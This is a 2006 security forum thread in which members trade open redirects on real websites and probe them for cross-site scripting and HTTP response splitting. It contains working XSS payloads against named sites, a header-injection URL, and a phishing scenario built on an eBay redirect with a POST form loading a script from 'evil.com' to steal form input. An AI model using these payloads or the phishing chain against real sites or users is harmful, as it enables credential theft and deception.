that's because it's actually a variable.. not a file path

example: http://rds.yahoo.com/search/submit/ystdblahblahblahasdfjklhwkljfhakldfhasdf/*http://ha.ckers.org/

-maluc

given that i worked out you can just use

http://rds.yahoo.com/*http://ha.ckers.org/

must be anything with an asterix is defined as a redirect

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://www.gamedev.net/community/forums/goto.asp?redir=http://google.com

-maluc

I've been lurking for a while and decided to join the fun.

In honor of their recent acquisition by Google...

http://www.youtube.com/verify_age?next_url=HTTP://SLA.CKERS.ORG

This one is 2-stage... you have to click on the button.

I tried to insert some script but no luck. Nevertheless, this one is neato.

Welcome wwwweirdo and thanks for posting... which button do we need to click on or should we already be authenticated?

- RSnake
Gotta love it. http://ha.ckers.org

Yup - be logged in to YouTube and you'll see the following:

This video may contain content that is inappropriate for some users, as flagged by YouTube's user community.

By clicking "Confirm," you are agreeing that all videos flagged by the YouTube community will be viewable by this account.

[Confirm] <- this is the button

Ah, gotcha... obscure but good find.

- RSnake
Gotta love it. http://ha.ckers.org

Imagine that, an obsucure post by a guy named wwweirdo.

Shocking!

another

http://a.tribalfusion.com/h.click/FUCWKBJMNEKLHKPBRNWKCKJNRLSUQEYTQFCKKGQPTQRXIKJIGGOMHHDIKJSWRLNPIUEWKHHNMHOFEJOM/http://sla.ckers.org



Edited 1 time(s). Last edit at 10/10/2006 07:00PM by wwweirdo.

http://directory.poland.com/link.php?url=http://sla.ckers.org

interestingly... browser url doesn't change, at least in firefox on leenucks.

anyone have msie handy?

I don't have time to see what it's doing right now, it's being demanded of me that I cook something.

weirdo: that's because it loads it into a frame, not a redirect .. and fortunately, into a frame that you can break out of, like so:

http://directory.poland.com/link.php?url=http://maluc.sitesled.com/xss.html?%22%3E%3Cframe%20src=about:blank%20onload=alert(document.cookie)%3E%3C/frameset%3E

the first popup, is loaded by the

<frame src="http://maluc.sitesled.com/xss.html?">

and shows that it doesn't have access to the DOM or poland.com's cookies


the injected frame event, however, does:

<frame src=about:blank onload=alert(location.host+document.cookie)>

.. there's no cookies for directory.poland.com to demonstrate, but u get the idea.

You can combine it into one frame http://directory.poland.com/link.php?url=http://maluc.sitesled.com/xss.html?%22%20onload=alert(location.host%2Bdocument.cookie)%3E%3C/frameset%3E , i just did it separate to illustrate the difference.

-maluc

oops, wrong thread.



Edited 1 time(s). Last edit at 10/11/2006 10:39PM by Ghozt.

http://www2.warnerbros.com/event.ng/Type=click&Redirect=http:%2F%2Fwww.asdf.com

-maluc

Maluc are you already testing these for HTTP Reponse splitting too? I don't want to do double duty on your finds if you are already looking for them.

- RSnake
Gotta love it. http://ha.ckers.org

oh.. i didnt look for that one, because i was lazy .. and i'd bet that its vulnerable to it.

But generally i do check now.. so you could skip them if you want. However, i still don't fully understand all the variations and why. I just pieced it together by looking at the ones you posted.

-maluc

actually, can you take a look at this one though? it only seems to allow 10 characters to be injected into the header..

-maluc

You're absolutely right, this isn't exploitable for the soul reason that there just isn't enough data, although you can do annoying things like set cookies if for some reason that was helpful on that cname on that domain (ww2.):

http://www2.warnerbros.com/event.ng/Type=click&Redirect=%0ASet-Cookie:blah=blah

- RSnake
Gotta love it. http://ha.ckers.org

http://cgi1.ebay.it/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://google.com/

i can't take credit for this.. i found it thanks to a phishing email i received. Seems to work for all their TLD's .com .it etc .. just goes to show how dangerous redirects can be. Someone who thinks they know how to check if its real or not by looking at the domain (i.e. http //ebay.com.sk3dn.ru/ is fishy) .. will be fooled along with the totally clueless ones.

http //cgi1.ebay.it/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://200.72.242.999/mambo/cache/04110012600115000800008400061000640006100126/SignIncopartnerId=2pUserId=siteid=0pageType=pa1=i1=bshowgif=UsingSSL=ru=pp=pa2=errmsg=runame=ruparams=ruproduct=sid=favoritenav=confirm=ebxPageType=existingEmail=isCheckout=migrateVisitor.htm

looks pretty legit to a normal user. (changing the .999 to .44 will give you the live site)

-maluc

amusingly, this would pass their 'spot a fake' tutorial..

Quote

Legitimate eBay Web Addresses
To determine if the Web address in your browser is a real eBay address, look for
".ebay.com" immediately before the first "/". In the below examples, notice that
there must be a "." before eBay.com for the address to be legitimate.

-maluc

@ maluc: Once it redirects, it doesn't pass the "Spot a fake" tutorial, because it shows the IP/mambo.

You're correct, but getting them to click the link from their email is half the battle. Their mission may not be to just do the stereotypical fake login page.. but instead make use of an XSS hole on ebay.com that works for POST only. They could for example:

1.)Send them an email with:

http //cgi1.ebay.fr/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://evil.com

2.)Redirect them back to ebay using the POST xss

<form name="postxss" method="post" action="http://ebay.com/login.asp">
<input type="hidden" name="vulnerable" value='"><script src=http://evil.com/formstealer.js>' />
<input type="submit" />
</form>
<script type="text/javascript">
postxss.submit();
</script>

They click a valid ebay link in their email, and they see a valid ebay link at the end. Normally a POST xss would not be able to be distributed by email without the use of a redirect like so.. or an oviously fake domain
http //ebay.com.ebayverify.cz

-maluc



Edited 1 time(s). Last edit at 10/13/2006 07:41PM by maluc.

http://www.yellowpages.com/sp/exittracking/?&path=http%3A//www.asdf.com

http://www.switchboard.com/bin/cgiredir.dll?ID=515&URL=http://www.asdf.com

-maluc

[www.theonion.com]

target=base64 encoded 'http://ha.ckers.org'

heh, don't see too many base64 in use .. unfortunately it goes to a 'leaving website' page for 10seconds before redirecting.. if you don't already have the 'premercial' cookie

but fortunately.. base64 and other encoding often gets overlooked for the filtering. so it left 3 points of injection

-maluc

maluc most tgp sites use base64 on the thumbnails when not using plain url, actually most tgp sites could be in this topic lol (and many might be good for HTTP Response splitting).

now one more redirection: http://shareup.com/getfile.php?v=8527&file=http%3A%2F%2Fwww.google.com

is this good for anything besides phishing?
also how can i see how is the redirection being done (see if its a 301 redirect or something like that)?

ty : )

nrg... I use burp proxy personally... it's by far the most useful tool in my haX0ring collection. Just adust the settings to watch both inbound and outbound connections and allow all types (not just text) and you'll see everything your browser sees in slow motion. It's super helpful, especially if you want to test alternate headers but don't want to have to build a custom flash file each time. Use it, love it.

- RSnake
Gotta love it. http://ha.ckers.org

I asked the same question about the uses for phishing towards the beginning of this thread.. which RSnake answered well:

Quote

Well, if they are vulnerable to response splitting you get the side advantage of also getting some XSS out of it, but you're essentially right. Redirection is mostly for phishing, and mostly it's not good even for referrer masking as most browsers keep the referrer through 301 redirection of the original page, not the page that does the redirection itself.

However, for a limited time only (and in just 3 easy payments of 29.99) they're also useful for the IE6/IE7 bug http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/ which allows you to pull content remotely, from any domain, via javascript - with the use of any open 302 redirect that doesn't require you to start with http://. In other words, throws the Same Origin Policy out the window.

And as RSnake also pointed out on the ha.ckers blog.. that globally disables the CSRF protections of tokens. Once this is patched however, theyre mostly just good for phishing or response splitting or javascript:alert() type XSS. And referrer masking.

I too am in love with burp proxy.. although i generally use firefox's Live HTTP Headers extension instead, for things like viewing redirect types and paths. A personal preference..

-maluc

Maluc, I owe you a beer sometime. Just accept it as a gift from me to you cuz you rock the house.

Anyway, I thought this one was amusing: https://www.scanalert.com/Link.sa?url=http://www.yahoo.com

- RSnake
Gotta love it. http://ha.ckers.org

lol, i'm not positive what i did to deserve it this time - but i've said before that i'm never one to turn down free liquor ^^.

and heh, always amusing to see security companies with security issues. i'm writing a mhtmlAPI.js right now, i'll be sure to have it run off scanalert..

-maluc

Well after a great deal of testing.. if you want to solely use javascript for the mhtml exploiting, it requires more than just an open redirect by itself. needs one of the following to be true:

1. an open redirect, plus an XSS (persistent/reflexive) on the same domain.
2. an open redirect on your own domain
3. an open redirect susceptible to response splitting
4. other ways i'm too tired to think of

You could also use a proxy (like Google Translator) but that would defeat the purpose of CSRF as it'll be a Google bot that requests the page, not the victim.

Luckily, it's not tough to find an XSS hole in half of the domains in this thread. I found a persistent XSS in tinyurl which i'll be using once i find the time to finish this API for it. hopefully some time tomorrow

Edit: added #3 which RSnake pointed out is also possible

-maluc



Edited 1 time(s). Last edit at 10/23/2006 11:31PM by maluc.